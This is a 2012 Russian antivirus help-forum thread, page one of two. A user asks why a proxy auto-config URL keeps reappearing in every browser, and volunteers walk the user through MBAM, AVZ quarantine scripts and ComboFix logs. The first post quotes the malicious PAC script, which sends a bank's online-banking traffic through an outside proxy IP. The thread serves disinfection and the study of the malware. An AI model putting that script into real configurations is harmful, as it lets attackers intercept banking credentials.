Страница 1 из 2 12 Последняя
Показано с 1 по 20 из 39.

Везде прописывается URL автоматической настройки сервера прокси (заявка № 121982)

  1. #1
    Junior Member Репутация
    Регистрация
    01.07.2012
    Сообщений
    19
    Вес репутации
    43

    Везде прописывается URL автоматической настройки сервера прокси

    Здравствуйте!

    Не могу победить проблему видимо вирус.

    У меня во всех браузерах в функционале "URL автоматической настройки сервера прокси" прописывается адрес: ---

    Браузеры при этом достаточно медленно загружают страницы, но всё работает.
    Если поставить без прокси всё летает.
    Но убрать полностью этот адрес не получается, после закрытия и открытия браузера снова, система делает этот адрес по умолчанию.

    Как удалось выяснить по этой ссылке расположен следующий скрипт:

    function FindProxyForURL(url, host)
    {
    var proxy_yes = "PROXY 194.60.242.41:13329";
    var proxy_no = "DIRECT";
    if (dnsDomainIs(host,"retail.payment.ru")) { return proxy_yes; }
    return proxy_no;
    }

    Как видно - трафик на https://retail.payment.ru (это интернет-банк ПромСвязьБанка) будет идти не напрямую, а через указанный прокси 194.60.242.41:13329

    WHOIS информация по этому IP-адресу вывела на контакт: [email protected]

    Просил разобраться с организаторами этого прокси-сервера, который создан очевидно для кражи паролей интернет-банка, и закрыть этот прокси, но в ответ тишина.

    Тем времени победить у себя и удалить эту ссылку из браузеров не удаётся...

    Надеюсь на Вашу помощь!
    Вложения Вложения
    Последний раз редактировалось Никита Соловьев; 02.07.2012 в 02:12.

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,287
    Вес репутации
    378
    Уважаемый(ая) Bomber, спасибо за обращение на наш форум!

    Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.

    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Techno
    Регистрация
    25.08.2009
    Адрес
    Россия
    Сообщений
    10,965
    Вес репутации
    406


  5. #4
    Junior Member Репутация
    Регистрация
    01.07.2012
    Сообщений
    19
    Вес репутации
    43

  6. #5
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Techno
    Регистрация
    25.08.2009
    Адрес
    Россия
    Сообщений
    10,965
    Вес репутации
    406
    Удалите в MBAM:
    Код:
    HKCR\AppID\{D96FA298-1BB6-47FC-AD21-72781B744DC3} (Adware.Reklosoft) -> Действие не было предпринято.
    HKCR\CLSID\{71E59D37-D7FC-4ED6-BC1D-D13BE02FE6C5} (Trojan.Kerlofost) -> Действие не было предпринято.
    HKCR\TypeLib\{2552632F-867D-4052-B836-7F83A5302534} (Trojan.Kerlofost) -> Действие не было предпринято.
    HKCR\Interface\{E743CF05-181C-4D72-B4EE-95435ED4B86B} (Trojan.Kerlofost) -> Действие не было предпринято.
    HKCR\rs_adw.Helper_bho.1 (Trojan.Kerlofost) -> Действие не было предпринято.
    HKCR\rs_adw.Helper_bho (Trojan.Kerlofost) -> Действие не было предпринято.
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{71E59D37-D7FC-4ED6-BC1D-D13BE02FE6C5} (Trojan.Kerlofost) -> Действие не было предпринято.
    HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{71E59D37-D7FC-4ED6-BC1D-D13BE02FE6C5} (Trojan.Kerlofost) -> Действие не было предпринято.
    HKCR\CLSID\{FFFFE708-B832-42F1-BAFF-247753B5E452} (Trojan.BHO) -> Действие не было предпринято.
    HKCR\rs_adw.Helper_Bar.1 (Trojan.BHO) -> Действие не было предпринято.
    HKLM\SOFTWARE\Microsoft\Internet Explorer\Explorer Bars\{FFFFE708-B832-42F1-BAFF-247753B5E452} (Trojan.BHO) -> Действие не было предпринято.
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\TNod (Trojan.Agent.CK) -> Действие не было предпринято.
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NewProduct 1.00 (Backdoor.Agent.CoGen) -> Действие не было предпринято.
    HKCR\reklosoft_adw.Helper_Bar (Trojan.Kerlofost) -> Действие не было предпринято.
    HKCR\AppID\rs_adw.DLL (Trojan.Agent) -> Действие не было предпринято.
    HKCU\Software\SearchHelper (Adware.Reklosoft) -> Действие не было предпринято.
    
    C:\Program Files\Company\NewProduct (Backdoor.Agent.CoGen) -> Действие не было предпринято.
    C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66} (Trojan.Kerlofost) -> Действие не было предпринято.
    C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\chrome (Trojan.Kerlofost) -> Действие не было предпринято.
    C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\chrome\content (Trojan.Kerlofost) -> Действие не было предпринято.
    C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\defaults (Trojan.Kerlofost) -> Действие не было предпринято.
    C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\defaults\preferences (Trojan.Kerlofost) -> Действие не было предпринято.
    
    C:\Program Files\Company\NewProduct\Uninstall.ini (Backdoor.Agent.CoGen) -> Действие не было предпринято.
    C:\Program Files\Company\NewProduct\Uninstall.exe (Backdoor.Agent.CoGen) -> Действие не было предпринято.
    C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\chrome.manifest (Trojan.Kerlofost) -> Действие не было предпринято.
    C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\extension.reg (Trojan.Kerlofost) -> Действие не было предпринято.
    C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\install.rdf (Trojan.Kerlofost) -> Действие не было предпринято.
    C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\chrome\content\extensions.xul (Trojan.Kerlofost) -> Действие не было предпринято.
    C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\chrome\content\logo.png (Trojan.Kerlofost) -> Действие не было предпринято.
    C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\chrome\content\main.js (Trojan.Kerlofost) -> Действие не было предпринято.
    C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\chrome\content\main.xul (Trojan.Kerlofost) -> Действие не было предпринято.
    C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\chrome\content\q.png (Trojan.Kerlofost) -> Действие не было предпринято.
    C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\chrome\content\q_gray.png (Trojan.Kerlofost) -> Действие не было предпринято.
    C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\chrome\content\x.png (Trojan.Kerlofost) -> Действие не было предпринято.
    C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\chrome\content\x_gray.png (Trojan.Kerlofost) -> Действие не было предпринято.
    C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\defaults\preferences\main.js (Trojan.Kerlofost) -> Действие не было предпринято.
    C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\defaults\preferences\main.js.old (Trojan.Kerlofost) -> Действие не было предпринято.
    C:\Program Files\Spyware Process Detector - знакома программа?


  7. #6
    Junior Member Репутация
    Регистрация
    01.07.2012
    Сообщений
    19
    Вес репутации
    43
    Spyware Process Detector знакома, что-то в ней нужно сделать?
    Сейчас планирую сделать что Вы написали про "Удалите в MBAM:".

  8. #7
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Techno
    Регистрация
    25.08.2009
    Адрес
    Россия
    Сообщений
    10,965
    Вес репутации
    406
    Цитата Сообщение от Bomber Посмотреть сообщение
    Spyware Process Detector знакома, что-то в ней нужно сделать?
    Ничего, просто мне она не знакома

    Цитата Сообщение от Bomber Посмотреть сообщение
    Сейчас планирую сделать что Вы написали про "Удалите в MBAM:".
    Делайте...


  9. #8
    Junior Member Репутация
    Регистрация
    01.07.2012
    Сообщений
    19
    Вес репутации
    43
    Делайте...
    Извиняюсь за задержку с ответом!
    Не помогло всё сделал как написали, но прокси всё равно автоматом прописывает ту самую пресловутую ссылку....

    Прикладываю лог.
    mbam-log-2012-07-05 (21-22-32).txt

  10. #9
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Techno
    Регистрация
    25.08.2009
    Адрес
    Россия
    Сообщений
    10,965
    Вес репутации
    406
    - Выполните в АВЗ:
    Код:
    begin
    QuarantineFile('C:\Program Files\Company\NewProduct\Uninstall.exe','');
    QuarantineFile('C:\WINDOWS\system32\wbem\winmgmt.exe','');
    QuarantineFile('C:\WINDOWS\system32\dllcache\winmgmt.exe','');
    CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
    end.

    Файл quarantine.zip из папки AVZ загрузите по ссылке "Прислать запрошенный карантин" вверху темы.

    Повторите логи АВЗ и Hijackthis.


  11. #10
    Junior Member Репутация
    Регистрация
    01.07.2012
    Сообщений
    19
    Вес репутации
    43
    Цитата Сообщение от Techno Посмотреть сообщение
    - Выполните в АВЗ:
    Код:
    begin
    QuarantineFile('C:\Program Files\Company\NewProduct\Uninstall.exe','');
    QuarantineFile('C:\WINDOWS\system32\wbem\winmgmt.exe','');
    QuarantineFile('C:\WINDOWS\system32\dllcache\winmgmt.exe','');
    CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
    end.

    Файл quarantine.zip из папки AVZ загрузите по ссылке "Прислать запрошенный карантин" вверху темы.

    Повторите логи АВЗ и Hijackthis.
    Файлик загрузил.

    Логи сейчас буду делать заново я так понимаю, как сделаю приложу.

    - - - Добавлено - - -

    virusinfo_syscheck.zip

    hijackthis.log

    Готово.

  12. #11
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Techno
    Регистрация
    25.08.2009
    Адрес
    Россия
    Сообщений
    10,965
    Вес репутации
    406
    Что с проблемой?

    Файлы проверьте на www.virustotal.com:
    Код:
    C:\WINDOWS\system32\wbem\winmgmt.exe
    C:\WINDOWS\system32\dllcache\winmgmt.exe


  13. #12
    Junior Member Репутация
    Регистрация
    01.07.2012
    Сообщений
    19
    Вес репутации
    43
    Проблема на месте, иначе бы я уже поблагодарил за её решение... =)

    Запустил файлы на том сайте, а что должно было произойти после проверки этих двух файлом на что обращать внимание?

  14. #13
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Techno
    Регистрация
    25.08.2009
    Адрес
    Россия
    Сообщений
    10,965
    Вес репутации
    406
    Цитата Сообщение от Bomber Посмотреть сообщение
    Запустил файлы на том сайте, а что должно было произойти после проверки этих двух файлом на что обращать внимание?
    Результаты проверки должен был выдать.

    - Сделайте лог ComboFix.


  15. #14
    Junior Member Репутация
    Регистрация
    01.07.2012
    Сообщений
    19
    Вес репутации
    43
    Прилагаю лог.
    log.txt

  16. #15
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Techno
    Регистрация
    25.08.2009
    Адрес
    Россия
    Сообщений
    10,965
    Вес репутации
    406
    Из файла c:\documents and settings\рс\Application Data\Mozilla\Firefox\Profiles\d73oc6wv.default\use r.js удалите строку
    Код:
    network.proxy.autoconfig_url - hxxp://reezz.com/Bg43ZV623/proxy.pac
    - - - Добавлено - - -

    Поищите на компьютере файл proxy.pac


  17. #16
    Junior Member Репутация
    Регистрация
    01.07.2012
    Сообщений
    19
    Вес репутации
    43
    Строку удалил.
    Поискал файл, но не нашёл.

    По прежнему ссылка автоматически прописывается при включении браузера.

  18. #17
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Techno
    Регистрация
    25.08.2009
    Адрес
    Россия
    Сообщений
    10,965
    Вес репутации
    406
    Цитата Сообщение от Bomber Посмотреть сообщение
    Строку удалил.
    Она снова не появилась?

    Поищите в реестре параметры autoconfigurl...


  19. #18
    Junior Member Репутация
    Регистрация
    01.07.2012
    Сообщений
    19
    Вес репутации
    43
    Снова не появилась, была в таком же файле с раширением .bak удалил ссылку и там эту.

    В реестре найденные запросы по слову "autoconfigurl" пусты.

  20. #19
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Techno
    Регистрация
    25.08.2009
    Адрес
    Россия
    Сообщений
    10,965
    Вес репутации
    406
    Повторите комбофикс.


  21. #20
    Junior Member Репутация
    Регистрация
    01.07.2012
    Сообщений
    19
    Вес репутации
    43
    Чую скоро стану гуру создания логов =)

    Прилагаю:
    log.txt

  • Уважаемый(ая) Bomber, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Страница 1 из 2 12 Последняя

    Похожие темы

    1. Ответов: 27
      Последнее сообщение: 02.08.2012, 22:13
    2. Ответов: 3
      Последнее сообщение: 06.07.2012, 19:52
    3. Подмена прокси-сервера
      От Grower в разделе Помогите!
      Ответов: 2
      Последнее сообщение: 15.03.2009, 15:52
    4. БСОД прокси сервера
      От Terny в разделе Помогите!
      Ответов: 10
      Последнее сообщение: 22.02.2009, 09:28

    Метки для этой темы

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.00877 seconds with 18 queries